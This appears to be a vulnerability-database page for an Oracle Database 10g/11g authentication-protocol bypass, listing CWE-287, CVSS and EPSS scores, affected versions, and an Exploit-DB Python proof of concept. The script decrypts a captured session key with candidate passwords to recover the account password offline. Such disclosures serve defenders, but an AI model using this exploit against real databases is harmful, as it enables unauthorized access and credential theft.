Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-287 |
Improper Authentication When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
6.4 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:N |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 22069
Publication date : 2012-10-17 22h00 +00:00
Author : Esteban Martinez Fayo
EDB Verified : No
source: https://www.securityfocus.com/bid/55651/info
Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol.
An attacker can exploit this issue to bypass the authentication process and gain unauthorized access to the database.
This vulnerability affects Oracle Database 11g Release 1 and 11g Release 2.
#-*-coding:utf8 -*-
import hashlib
from Crypto.Cipher import AES
def decrypt(session,salt,password):
pass_hash = hashlib.sha1(password+salt)
#......... ..... ..... .......... .. 24 ....
key = pass_hash.digest() + '\x00\x00\x00\x00'
decryptor = AES.new(key,AES.MODE_CBC)
plain = decryptor.decrypt(session)
return plain
#............. ........... ...... 48 ....
session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'
#.... 10 ....
salt_hex = 'A7193E546377EC56639E'
passwords = ['test','password','oracle','demo']
for password in passwords:
session_id = decrypt(session_hex.decode('hex'),salt_hex.decode('hex'),password)
print 'Decrypted session_id for password "%s" is %s' % (password,session_id.encode('hex'))
if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08':
print 'PASSWORD IS "%s"' % password
break
Products Mentioned
Configuraton 0
Oracle>>Database_server >> Version 10.2.0.3
Oracle>>Database_server >> Version 10.2.0.4
Oracle>>Database_server >> Version 10.2.0.5
Oracle>>Database_server >> Version 11.1.0.7
Oracle>>Database_server >> Version 11.2.0.2
Oracle>>Database_server >> Version 11.2.0.3
Configuraton 0
Oracle>>Primavera_p6_enterprise_project_portfolio_management >> Version 8.2
- Oracle>>Primavera_p6_enterprise_project_portfolio_management >> Version 8.2 (Open CPE detail)
Oracle>>Primavera_p6_enterprise_project_portfolio_management >> Version 8.3
- Oracle>>Primavera_p6_enterprise_project_portfolio_management >> Version 8.3 (Open CPE detail)
Oracle>>Primavera_p6_enterprise_project_portfolio_management >> Version 8.4
- Oracle>>Primavera_p6_enterprise_project_portfolio_management >> Version 8.4 (Open CPE detail)
References